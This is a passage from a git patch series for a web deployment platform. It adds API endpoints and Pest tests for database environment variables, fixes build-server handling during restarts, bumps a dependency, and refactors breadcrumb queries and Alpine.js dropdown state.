+                  items: { properties: { key: { type: string, description: 'The key of the environment variable.' }, value: { type: string, description: 'The value of the environment variable.' }, is_literal: { type: boolean, description: 'The flag to indicate if the environment variable is a literal, nothing espaced.' }, is_multiline: { type: boolean, description: 'The flag to indicate if the environment variable is multiline.' }, is_shown_once: { type: boolean, description: "The flag to indicate if the environment variable's value is shown on the UI." } }, type: object }
+              type: object
+      responses:
+        '201':
+          description: 'Environment variables updated.'
+          content:
+            application/json:
+              schema:
+                type: array
+                items:
+                  $ref: '#/components/schemas/EnvironmentVariable'
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
+  '/databases/{uuid}/envs/{env_uuid}':
+    delete:
+      tags:
+        - Databases
+      summary: 'Delete Env'
+      description: 'Delete env by UUID.'
+      operationId: delete-env-by-database-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the database.'
+          required: true
+          schema:
+            type: string
+        -
+          name: env_uuid
+          in: path
+          description: 'UUID of the environment variable.'
+          required: true
+          schema:
+            type: string
+      responses:
+        '200':
+          description: 'Environment variable deleted.'
+          content:
+            application/json:
+              schema:
+                properties:
+                  message: { type: string, example: 'Environment variable deleted.' }
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+      security:
+        -
+          bearerAuth: []
   /deployments:
     get:
       tags:
diff --git a/routes/api.php b/routes/api.php
index b02682a5b..1de365c49 100644
--- a/routes/api.php
+++ b/routes/api.php
@@ -154,6 +154,12 @@
     Route::delete('/databases/{uuid}/backups/{scheduled_backup_uuid}', [DatabasesController::class, 'delete_backup_by_uuid'])->middleware(['api.ability:write']);
     Route::delete('/databases/{uuid}/backups/{scheduled_backup_uuid}/executions/{execution_uuid}', [DatabasesController::class, 'delete_execution_by_uuid'])->middleware(['api.ability:write']);
 
+    Route::get('/databases/{uuid}/envs', [DatabasesController::class, 'envs'])->middleware(['api.ability:read']);
+    Route::post('/databases/{uuid}/envs', [DatabasesController::class, 'create_env'])->middleware(['api.ability:write']);
+    Route::patch('/databases/{uuid}/envs/bulk', [DatabasesController::class, 'create_bulk_envs'])->middleware(['api.ability:write']);
+    Route::patch('/databases/{uuid}/envs', [DatabasesController::class, 'update_env_by_uuid'])->middleware(['api.ability:write']);
+    Route::delete('/databases/{uuid}/envs/{env_uuid}', [DatabasesController::class, 'delete_env_by_uuid'])->middleware(['api.ability:write']);
+
     Route::match(['get', 'post'], '/databases/{uuid}/start', [DatabasesController::class, 'action_deploy'])->middleware(['api.ability:deploy']);
     Route::match(['get', 'post'], '/databases/{uuid}/restart', [DatabasesController::class, 'action_restart'])->middleware(['api.ability:deploy']);
     Route::match(['get', 'post'], '/databases/{uuid}/stop', [DatabasesController::class, 'action_stop'])->middleware(['api.ability:deploy']);
diff --git a/tests/Feature/DatabaseEnvironmentVariableApiTest.php b/tests/Feature/DatabaseEnvironmentVariableApiTest.php
new file mode 100644
index 000000000..f3297cf17
--- /dev/null
+++ b/tests/Feature/DatabaseEnvironmentVariableApiTest.php
@@ -0,0 +1,346 @@
+<?php
+
+use App\Models\Environment;
+use App\Models\EnvironmentVariable;
+use App\Models\InstanceSettings;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\StandalonePostgresql;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    InstanceSettings::updateOrCreate(['id' => 0]);
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    session(['currentTeam' => $this->team]);
+
+    $this->token = $this->user->createToken('test-token', ['*']);
+    $this->bearerToken = $this->token->plainTextToken;
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = StandaloneDocker::where('server_id', $this->server->id)->first();
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+});
+
+function createDatabase($context): StandalonePostgresql
+{
+    return StandalonePostgresql::create([
+        'name' => 'test-postgres',
+        'image' => 'postgres:15-alpine',
+        'postgres_user' => 'postgres',
+        'postgres_password' => 'password',
+        'postgres_db' => 'postgres',
+        'environment_id' => $context->environment->id,
+        'destination_id' => $context->destination->id,
+        'destination_type' => $context->destination->getMorphClass(),
+    ]);
+}
+
+describe('GET /api/v1/databases/{uuid}/envs', function () {
+    test('lists environment variables for a database', function () {
+        $database = createDatabase($this);
+
+        EnvironmentVariable::create([
+            'key' => 'CUSTOM_VAR',
+            'value' => 'custom_value',
+            'resourceable_type' => StandalonePostgresql::class,
+            'resourceable_id' => $database->id,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->getJson("/api/v1/databases/{$database->uuid}/envs");
+
+        $response->assertStatus(200);
+        $response->assertJsonFragment(['key' => 'CUSTOM_VAR']);
+    });
+
+    test('returns empty array when no environment variables exist', function () {
+        $database = createDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->getJson("/api/v1/databases/{$database->uuid}/envs");
+
+        $response->assertStatus(200);
+        $response->assertJson([]);
+    });
+
+    test('returns 404 for non-existent database', function () {
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->getJson('/api/v1/databases/non-existent-uuid/envs');
+
+        $response->assertStatus(404);
+    });
+});
+
+describe('POST /api/v1/databases/{uuid}/envs', function () {
+    test('creates an environment variable', function () {
+        $database = createDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson("/api/v1/databases/{$database->uuid}/envs", [
+            'key' => 'NEW_VAR',
+            'value' => 'new_value',
+        ]);
+
+        $response->assertStatus(201);
+
+        $env = EnvironmentVariable::where('key', 'NEW_VAR')
+            ->where('resourceable_id', $database->id)
+            ->where('resourceable_type', StandalonePostgresql::class)
+            ->first();
+
+        expect($env)->not->toBeNull();
+        expect($env->value)->toBe('new_value');
+    });
+
+    test('creates an environment variable with comment', function () {
+        $database = createDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson("/api/v1/databases/{$database->uuid}/envs", [
+            'key' => 'COMMENTED_VAR',
+            'value' => 'some_value',
+            'comment' => 'This is a test comment',
+        ]);
+
+        $response->assertStatus(201);
+
+        $env = EnvironmentVariable::where('key', 'COMMENTED_VAR')
+            ->where('resourceable_id', $database->id)
+            ->first();
+
+        expect($env->comment)->toBe('This is a test comment');
+    });
+
+    test('returns 409 when environment variable already exists', function () {
+        $database = createDatabase($this);
+
+        EnvironmentVariable::create([
+            'key' => 'EXISTING_VAR',
+            'value' => 'existing_value',
+            'resourceable_type' => StandalonePostgresql::class,
+            'resourceable_id' => $database->id,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson("/api/v1/databases/{$database->uuid}/envs", [
+            'key' => 'EXISTING_VAR',
+            'value' => 'new_value',
+        ]);
+
+        $response->assertStatus(409);
+    });
+
+    test('returns 422 when key is missing', function () {
+        $database = createDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson("/api/v1/databases/{$database->uuid}/envs", [
+            'value' => 'some_value',
+        ]);
+
+        $response->assertStatus(422);
+    });
+});
+
+describe('PATCH /api/v1/databases/{uuid}/envs', function () {
+    test('updates an environment variable', function () {
+        $database = createDatabase($this);
+
+        EnvironmentVariable::create([
+            'key' => 'UPDATE_ME',
+            'value' => 'old_value',
+            'resourceable_type' => StandalonePostgresql::class,
+            'resourceable_id' => $database->id,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}/envs", [
+            'key' => 'UPDATE_ME',
+            'value' => 'new_value',
+        ]);
+
+        $response->assertStatus(201);
+
+        $env = EnvironmentVariable::where('key', 'UPDATE_ME')
+            ->where('resourceable_id', $database->id)
+            ->first();
+
+        expect($env->value)->toBe('new_value');
+    });
+
+    test('returns 404 when environment variable does not exist', function () {
+        $database = createDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}/envs", [
+            'key' => 'NONEXISTENT',
+            'value' => 'value',
+        ]);
+
+        $response->assertStatus(404);
+    });
+});
+
+describe('PATCH /api/v1/databases/{uuid}/envs/bulk', function () {
+    test('creates environment variables with comments', function () {
+        $database = createDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}/envs/bulk", [
+            'data' => [
+                [
+                    'key' => 'DB_HOST',
+                    'value' => 'localhost',
+                    'comment' => 'Database host',
+                ],
+                [
+                    'key' => 'DB_PORT',
+                    'value' => '5432',
+                ],
+            ],
+        ]);
+
+        $response->assertStatus(201);
+
+        $envWithComment = EnvironmentVariable::where('key', 'DB_HOST')
+            ->where('resourceable_id', $database->id)
+            ->where('resourceable_type', StandalonePostgresql::class)
+            ->first();
+
+        $envWithoutComment = EnvironmentVariable::where('key', 'DB_PORT')
+            ->where('resourceable_id', $database->id)
+            ->where('resourceable_type', StandalonePostgresql::class)
+            ->first();
+
+        expect($envWithComment->comment)->toBe('Database host');
+        expect($envWithoutComment->comment)->toBeNull();
+    });
+
+    test('updates existing environment variables via bulk', function () {
+        $database = createDatabase($this);
+
+        EnvironmentVariable::create([
+            'key' => 'BULK_VAR',
+            'value' => 'old_value',
+            'comment' => 'Old comment',
+            'resourceable_type' => StandalonePostgresql::class,
+            'resourceable_id' => $database->id,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}/envs/bulk", [
+            'data' => [
+                [
+                    'key' => 'BULK_VAR',
+                    'value' => 'new_value',
+                    'comment' => 'Updated comment',
+                ],
+            ],
+        ]);
+
+        $response->assertStatus(201);
+
+        $env = EnvironmentVariable::where('key', 'BULK_VAR')
+            ->where('resourceable_id', $database->id)
+            ->first();
+
+        expect($env->value)->toBe('new_value');
+        expect($env->comment)->toBe('Updated comment');
+    });
+
+    test('rejects comment exceeding 256 characters', function () {
+        $database = createDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}/envs/bulk", [
+            'data' => [
+                [
+                    'key' => 'TEST_VAR',
+                    'value' => 'value',
+                    'comment' => str_repeat('a', 257),
+                ],
+            ],
+        ]);
+
+        $response->assertStatus(422);
+    });
+
+    test('returns 400 when data is missing', function () {
+        $database = createDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}/envs/bulk", []);
+
+        $response->assertStatus(400);
+    });
+});
+
+describe('DELETE /api/v1/databases/{uuid}/envs/{env_uuid}', function () {
+    test('deletes an environment variable', function () {
+        $database = createDatabase($this);
+
+        $env = EnvironmentVariable::create([
+            'key' => 'DELETE_ME',
+            'value' => 'to_delete',
+            'resourceable_type' => StandalonePostgresql::class,
+            'resourceable_id' => $database->id,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->deleteJson("/api/v1/databases/{$database->uuid}/envs/{$env->uuid}");
+
+        $response->assertStatus(200);
+        $response->assertJson(['message' => 'Environment variable deleted.']);
+
+        expect(EnvironmentVariable::where('uuid', $env->uuid)->first())->toBeNull();
+    });
+
+    test('returns 404 for non-existent environment variable', function () {
+        $database = createDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->deleteJson("/api/v1/databases/{$database->uuid}/envs/non-existent-uuid");
+
+        $response->assertStatus(404);
+    });
+});

From 65ed407ec82389408fb4f4b210c38eb9f08890fe Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 19 Mar 2026 23:42:11 +0100
Subject: [PATCH 094/213] fix(deployment): disable build server during restart
 operations
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

The just_restart() method doesn't need the build server—disabling it ensures
the helper container is created on the deployment server with the correct
network configuration and flags. The build server setting is restored before
should_skip_build() is called in case it triggers a full rebuild that requires it.
---
 app/Jobs/ApplicationDeploymentJob.php | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 7adb938c5..7075fd8a3 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -1103,10 +1103,21 @@ private function generate_image_names()
     private function just_restart()
     {
         $this->application_deployment_queue->addLogEntry("Restarting {$this->customRepository}:{$this->application->git_branch} on {$this->server->name}.");
+
+        // Restart doesn't need the build server — disable it so the helper container
+        // is created on the deployment server with the correct network/flags.
+        $originalUseBuildServer = $this->use_build_server;
+        $this->use_build_server = false;
+
         $this->prepare_builder_image();
         $this->check_git_if_build_needed();
         $this->generate_image_names();
         $this->check_image_locally_or_remotely();
+
+        // Restore before should_skip_build() — it may re-enter decide_what_to_do()
+        // for a full rebuild which needs the build server.
+        $this->use_build_server = $originalUseBuildServer;
+
         $this->should_skip_build();
         $this->completeDeployment();
     }

From a7f07f66e3adf808f95c4ab5eed320bd640df462 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 19 Mar 2026 22:50:11 +0000
Subject: [PATCH 095/213] build(deps): bump league/commonmark from 2.8.1 to
 2.8.2

Bumps [league/commonmark](https://github.com/thephpleague/commonmark) from 2.8.1 to 2.8.2.
- [Release notes](https://github.com/thephpleague/commonmark/releases)
- [Changelog](https://github.com/thephpleague/commonmark/blob/2.8/CHANGELOG.md)
- [Commits](https://github.com/thephpleague/commonmark/compare/2.8.1...2.8.2)

---
updated-dependencies:
- dependency-name: league/commonmark
  dependency-version: 2.8.2
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 composer.lock | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/composer.lock b/composer.lock
index 993835a42..534b418fe 100644
--- a/composer.lock
+++ b/composer.lock
@@ -2663,16 +2663,16 @@
         },
         {
             "name": "league/commonmark",
-            "version": "2.8.1",
+            "version": "2.8.2",
             "source": {
                 "type": "git",
                 "url": "https://github.com/thephpleague/commonmark.git",
-                "reference": "84b1ca48347efdbe775426f108622a42735a6579"
+                "reference": "59fb075d2101740c337c7216e3f32b36c204218b"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/thephpleague/commonmark/zipball/84b1ca48347efdbe775426f108622a42735a6579",
-                "reference": "84b1ca48347efdbe775426f108622a42735a6579",
+                "url": "https://api.github.com/repos/thephpleague/commonmark/zipball/59fb075d2101740c337c7216e3f32b36c204218b",
+                "reference": "59fb075d2101740c337c7216e3f32b36c204218b",
                 "shasum": ""
             },
             "require": {
@@ -2766,7 +2766,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-03-05T21:37:03+00:00"
+            "time": "2026-03-19T13:16:38+00:00"
         },
         {
             "name": "league/config",

From e65ad22b42133b1941ffd75ecbbb9f19b6de972f Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 20 Mar 2026 00:02:18 +0100
Subject: [PATCH 096/213] refactor(breadcrumb): optimize queries and simplify
 state management

- Add column selection to breadcrumb queries for better performance
- Remove unused Alpine.js state (activeRes, activeMenuEnv, resPositions, menuPositions)
- Simplify dropdown logic by removing duplicate state handling in index view
- Change database relationship eager loading to use explicit column selection
---
 app/Livewire/Project/Resource/Index.php       | 127 +++--
 .../resources/breadcrumbs.blade.php           | 531 ++----------------
 .../livewire/project/resource/index.blade.php | 331 ++---------
 3 files changed, 167 insertions(+), 822 deletions(-)

diff --git a/app/Livewire/Project/Resource/Index.php b/app/Livewire/Project/Resource/Index.php
index be6e3e98f..094b61b28 100644
--- a/app/Livewire/Project/Resource/Index.php
+++ b/app/Livewire/Project/Resource/Index.php
@@ -13,33 +13,33 @@ class Index extends Component
 
     public Environment $environment;
 
-    public Collection $applications;
-
-    public Collection $postgresqls;
-
-    public Collection $redis;
-
-    public Collection $mongodbs;
-
-    public Collection $mysqls;
-
-    public Collection $mariadbs;
-
-    public Collection $keydbs;
-
-    public Collection $dragonflies;
-
-    public Collection $clickhouses;
-
-    public Collection $services;
-
     public Collection $allProjects;
 
     public Collection $allEnvironments;
 
     public array $parameters;
 
-    public function mount()
+    protected Collection $applications;
+
+    protected Collection $postgresqls;
+
+    protected Collection $redis;
+
+    protected Collection $mongodbs;
+
+    protected Collection $mysqls;
+
+    protected Collection $mariadbs;
+
+    protected Collection $keydbs;
+
+    protected Collection $dragonflies;
+
+    protected Collection $clickhouses;
+
+    protected Collection $services;
+
+    public function mount(): void
     {
         $this->applications = $this->postgresqls = $this->redis = $this->mongodbs = $this->mysqls = $this->mariadbs = $this->keydbs = $this->dragonflies = $this->clickhouses = $this->services = collect();
         $this->parameters = get_route_parameters();
@@ -55,31 +55,23 @@ public function mount()
 
         $this->project = $project;
 
-        // Load projects and environments for breadcrumb navigation (avoids inline queries in view)
+        // Load projects and environments for breadcrumb navigation
         $this->allProjects = Project::ownedByCurrentTeamCached();
         $this->allEnvironments = $project->environments()
+            ->select('id', 'uuid', 'name', 'project_id')
             ->with([
-                'applications.additional_servers',
-                'applications.destination.server',
-                'services',
-                'services.destination.server',
-                'postgresqls',
-                'postgresqls.destination.server',
-                'redis',
-                'redis.destination.server',
-                'mongodbs',
-                'mongodbs.destination.server',
-                'mysqls',
-                'mysqls.destination.server',
-                'mariadbs',
-                'mariadbs.destination.server',
-                'keydbs',
-                'keydbs.destination.server',
-                'dragonflies',
-                'dragonflies.destination.server',
-                'clickhouses',
-                'clickhouses.destination.server',
-            ])->get();
+                'applications:id,uuid,name,environment_id',
+                'services:id,uuid,name,environment_id',
+                'postgresqls:id,uuid,name,environment_id',
+                'redis:id,uuid,name,environment_id',
+                'mongodbs:id,uuid,name,environment_id',
+                'mysqls:id,uuid,name,environment_id',
+                'mariadbs:id,uuid,name,environment_id',
+                'keydbs:id,uuid,name,environment_id',
+                'dragonflies:id,uuid,name,environment_id',
+                'clickhouses:id,uuid,name,environment_id',
+            ])
+            ->get();
 
         $this->environment = $environment->loadCount([
             'applications',
@@ -94,11 +86,9 @@ public function mount()
             'services',
         ]);
 
-        // Eager load all relationships for applications including nested ones
+        // Eager load relationships for applications
         $this->applications = $this->environment->applications()->with([
             'tags',
-            'additional_servers.settings',
-            'additional_networks',
             'destination.server.settings',
             'settings',
         ])->get()->sortBy('name');
@@ -160,6 +150,49 @@ public function mount()
 
     public function render()
     {
-        return view('livewire.project.resource.index');
+        return view('livewire.project.resource.index', [
+            'applications' => $this->applications,
+            'postgresqls' => $this->postgresqls,
+            'redis' => $this->redis,
+            'mongodbs' => $this->mongodbs,
+            'mysqls' => $this->mysqls,
+            'mariadbs' => $this->mariadbs,
+            'keydbs' => $this->keydbs,
+            'dragonflies' => $this->dragonflies,
+            'clickhouses' => $this->clickhouses,
+            'services' => $this->services,
+            'applicationsJs' => $this->toSearchableArray($this->applications),
+            'postgresqlsJs' => $this->toSearchableArray($this->postgresqls),
+            'redisJs' => $this->toSearchableArray($this->redis),
+            'mongodbsJs' => $this->toSearchableArray($this->mongodbs),
+            'mysqlsJs' => $this->toSearchableArray($this->mysqls),
+            'mariadbsJs' => $this->toSearchableArray($this->mariadbs),
+            'keydbsJs' => $this->toSearchableArray($this->keydbs),
+            'dragonfliesJs' => $this->toSearchableArray($this->dragonflies),
+            'clickhousesJs' => $this->toSearchableArray($this->clickhouses),
+            'servicesJs' => $this->toSearchableArray($this->services),
+        ]);
+    }
+
+    private function toSearchableArray(Collection $items): array
+    {
+        return $items->map(fn ($item) => [
+            'uuid' => $item->uuid,
+            'name' => $item->name,
+            'fqdn' => $item->fqdn ?? null,
+            'description' => $item->description ?? null,
+            'status' => $item->status ?? '',
+            'server_status' => $item->server_status ?? null,
+            'hrefLink' => $item->hrefLink ?? '',
+            'destination' => [
+                'server' => [
+                    'name' => $item->destination?->server?->name ?? 'Unknown',
+                ],
+            ],
+            'tags' => $item->tags->map(fn ($tag) => [
+                'id' => $tag->id,
+                'name' => $tag->name,
+            ])->values()->toArray(),
+        ])->values()->toArray();
     }
 }
diff --git a/resources/views/components/resources/breadcrumbs.blade.php b/resources/views/components/resources/breadcrumbs.blade.php
index 135cad3a7..300a8d6e2 100644
--- a/resources/views/components/resources/breadcrumbs.blade.php
+++ b/resources/views/components/resources/breadcrumbs.blade.php
@@ -12,17 +12,18 @@
     $projects = $projects ?? Project::ownedByCurrentTeamCached();
     $environments = $environments ?? $resource->environment->project
         ->environments()
+        ->select('id', 'uuid', 'name', 'project_id')
         ->with([
-            'applications',
-            'services',
-            'postgresqls',
-            'redis',
-            'mongodbs',
-            'mysqls',
-            'mariadbs',
-            'keydbs',
-            'dragonflies',
-            'clickhouses',
+            'applications:id,uuid,name,environment_id',
+            'services:id,uuid,name,environment_id',
+            'postgresqls:id,uuid,name,environment_id',
+            'redis:id,uuid,name,environment_id',
+            'mongodbs:id,uuid,name,environment_id',
+            'mysqls:id,uuid,name,environment_id',
+            'mariadbs:id,uuid,name,environment_id',
+            'keydbs:id,uuid,name,environment_id',
+            'dragonflies:id,uuid,name,environment_id',
+            'clickhouses:id,uuid,name,environment_id',
         ])
         ->get();
     $currentProjectUuid = data_get($resource, 'environment.project.uuid');
@@ -63,7 +64,7 @@ class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolg
         </li>
 
         <!-- Environment Level -->
-        <li class="inline-flex items-center" x-data="{ envOpen: false, activeEnv: null, envPositions: {}, activeRes: null, resPositions: {}, activeMenuEnv: null, menuPositions: {}, closeTimeout: null, envTimeout: null, resTimeout: null, menuTimeout: null, toggle() { this.envOpen = !this.envOpen; if (!this.envOpen) { this.activeEnv = null; this.activeRes = null; this.activeMenuEnv = null; } }, open() { clearTimeout(this.closeTimeout); this.envOpen = true }, close() { this.closeTimeout = setTimeout(() => { this.envOpen = false; this.activeEnv = null; this.activeRes = null; this.activeMenuEnv = null; }, 100) }, openEnv(id) { clearTimeout(this.closeTimeout); clearTimeout(this.envTimeout); this.activeEnv = id }, closeEnv() { this.envTimeout = setTimeout(() => { this.activeEnv = null; this.activeRes = null; this.activeMenuEnv = null; }, 100) }, openRes(id) { clearTimeout(this.envTimeout); clearTimeout(this.resTimeout); this.activeRes = id }, closeRes() { this.resTimeout = setTimeout(() => { this.activeRes = null; this.activeMenuEnv = null; }, 100) }, openMenu(id) { clearTimeout(this.resTimeout); clearTimeout(this.menuTimeout); this.activeMenuEnv = id }, closeMenu() { this.menuTimeout = setTimeout(() => { this.activeMenuEnv = null; }, 100) } }">
+        <li class="inline-flex items-center" x-data="{ envOpen: false, activeEnv: null, envPositions: {}, closeTimeout: null, envTimeout: null, toggle() { this.envOpen = !this.envOpen; if (!this.envOpen) { this.activeEnv = null; } }, open() { clearTimeout(this.closeTimeout); this.envOpen = true }, close() { this.closeTimeout = setTimeout(() => { this.envOpen = false; this.activeEnv = null; }, 100) }, openEnv(id) { clearTimeout(this.closeTimeout); clearTimeout(this.envTimeout); this.activeEnv = id }, closeEnv() { this.envTimeout = setTimeout(() => { this.activeEnv = null; }, 100) } }">
             <div class="flex items-center relative" @mouseenter="open()"
                 @mouseleave="close()">
                 <a class="text-xs truncate lg:text-sm hover:text-warning" {{ wireNavigate() }}
@@ -80,17 +81,18 @@ class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolg
                     </svg>
                 </button>
 
-                <!-- Environment Dropdown Container -->
+                <!-- Environment Dropdown -->
                 <div x-show="envOpen" @click.outside="close()" x-transition:enter="transition ease-out duration-200"
                     x-transition:enter-start="opacity-0 scale-95" x-transition:enter-end="opacity-100 scale-100"
                     x-transition:leave="transition ease-in duration-75" x-transition:leave-start="opacity-100 scale-100"
-                    x-transition:leave-end="opacity-0 scale-95" class="absolute z-20 top-full mt-1 left-0 sm:left-auto max-w-[calc(100vw-1rem)]" x-init="$nextTick(() => { const rect = $el.getBoundingClientRect(); if (rect.right > window.innerWidth) { $el.style.left = 'auto'; $el.style.right = '0'; } })">
+                    x-transition:leave-end="opacity-0 scale-95"
+                    class="absolute z-20 top-full mt-1 left-0 sm:left-auto max-w-[calc(100vw-1rem)]"
+                    x-init="$nextTick(() => { const rect = $el.getBoundingClientRect(); if (rect.right > window.innerWidth) { $el.style.left = 'auto'; $el.style.right = '0'; } })">
                     <!-- Environment List -->
                     <div
                         class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200 max-h-96 overflow-y-auto scrollbar">
                         @foreach ($environments as $environment)
                             @php
-                                // Use pre-loaded relations instead of databases() method to avoid N+1 queries
                                 $envDatabases = collect()
                                     ->merge($environment->postgresqls ?? collect())
                                     ->merge($environment->redis ?? collect())
@@ -101,26 +103,17 @@ class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 bor
                                     ->merge($environment->dragonflies ?? collect())
                                     ->merge($environment->clickhouses ?? collect());
                                 $envResources = collect()
-                                    ->merge(
-                                        $environment->applications->map(
-                                            fn($app) => ['type' => 'application', 'resource' => $app],
-                                        ),
-                                    )
-                                    ->merge(
-                                        $envDatabases->map(fn($db) => ['type' => 'database', 'resource' => $db]),
-                                    )
-                                    ->merge(
-                                        $environment->services->map(
-                                            fn($svc) => ['type' => 'service', 'resource' => $svc],
-                                        ),
-                                    );
+                                    ->merge($environment->applications->map(fn($app) => ['type' => 'application', 'resource' => $app]))
+                                    ->merge($envDatabases->map(fn($db) => ['type' => 'database', 'resource' => $db]))
+                                    ->merge($environment->services->map(fn($svc) => ['type' => 'service', 'resource' => $svc]))
+                                    ->sortBy(fn($item) => strtolower($item['resource']->name));
                             @endphp
                             <div @mouseenter="openEnv('{{ $environment->uuid }}'); envPositions['{{ $environment->uuid }}'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
                                 @mouseleave="closeEnv()">
                                 <a href="{{ route('project.resource.index', [
-                                    'environment_uuid' => $environment->uuid,
-                                    'project_uuid' => $currentProjectUuid,
-                                ]) }}" {{ wireNavigate() }}
+                                        'environment_uuid' => $environment->uuid,
+                                        'project_uuid' => $currentProjectUuid,
+                                    ]) }}" {{ wireNavigate() }}
                                     class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200 {{ $environment->uuid === $currentEnvironmentUuid ? 'dark:text-warning font-semibold' : '' }}"
                                     title="{{ $environment->name }}">
                                     <span class="truncate">{{ $environment->name }}</span>
@@ -150,31 +143,29 @@ class="flex items-center gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover
                     <!-- Resources Sub-dropdown (2nd level) -->
                     @foreach ($environments as $environment)
                         @php
+                            $envDatabases = collect()
+                                ->merge($environment->postgresqls ?? collect())
+                                ->merge($environment->redis ?? collect())
+                                ->merge($environment->mongodbs ?? collect())
+                                ->merge($environment->mysqls ?? collect())
+                                ->merge($environment->mariadbs ?? collect())
+                                ->merge($environment->keydbs ?? collect())
+                                ->merge($environment->dragonflies ?? collect())
+                                ->merge($environment->clickhouses ?? collect());
                             $envResources = collect()
-                                ->merge(
-                                    $environment->applications->map(
-                                        fn($app) => ['type' => 'application', 'resource' => $app],
-                                    ),
-                                )
-                                ->merge(
-                                    $environment
-                                        ->databases()
-                                        ->map(fn($db) => ['type' => 'database', 'resource' => $db]),
-                                )
-                                ->merge(
-                                    $environment->services->map(fn($svc) => ['type' => 'service', 'resource' => $svc]),
-                                );
+                                ->merge($environment->applications->map(fn($app) => ['type' => 'application', 'resource' => $app]))
+                                ->merge($envDatabases->map(fn($db) => ['type' => 'database', 'resource' => $db]))
+                                ->merge($environment->services->map(fn($svc) => ['type' => 'service', 'resource' => $svc]));
                         @endphp
                         @if ($envResources->count() > 0)
                             <div x-show="activeEnv === '{{ $environment->uuid }}'" x-cloak
                                 x-transition:enter="transition ease-out duration-150"
                                 x-transition:enter-start="opacity-0" x-transition:enter-end="opacity-100"
-                                @mouseenter="openEnv('{{ $environment->uuid }}')"
-                                @mouseleave="closeEnv()"
+                                @mouseenter="openEnv('{{ $environment->uuid }}')" @mouseleave="closeEnv()"
